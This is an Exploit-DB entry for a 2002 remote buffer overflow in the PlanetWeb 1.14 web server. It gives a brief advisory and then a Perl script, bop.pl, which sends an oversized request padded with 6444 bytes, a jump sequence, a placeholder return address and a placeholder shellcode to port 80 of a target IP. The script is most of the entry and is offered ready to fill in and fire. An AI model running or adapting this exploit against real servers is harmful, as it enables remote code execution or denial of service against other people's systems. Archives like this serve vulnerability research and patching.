PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability

2002-10-17T00:00:00
ID EDB-ID:21945
Type exploitdb
Reporter securma massine
Modified 2002-10-17T00:00:00

Description

PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/5988/info

PlanetWeb is a commercially available web server integrated with dynamic DNS services. It is distributed by PlanetDNS, and available for Microsoft Operating Systems.

PlanetWeb does not properly handle long requests. Due to insufficient bounds checking, a long request sent to PlanetWeb may result in a buffer overflow. This could result in a denial of service, and has been reported as being exploitable to execute arbitrary code. 

#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet christal...plus tu p�dales moins fort, moins tu #avances plus vite..)
#

use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!! \n\n";
 exit;
}

$shellcode =
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#add your favorit shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";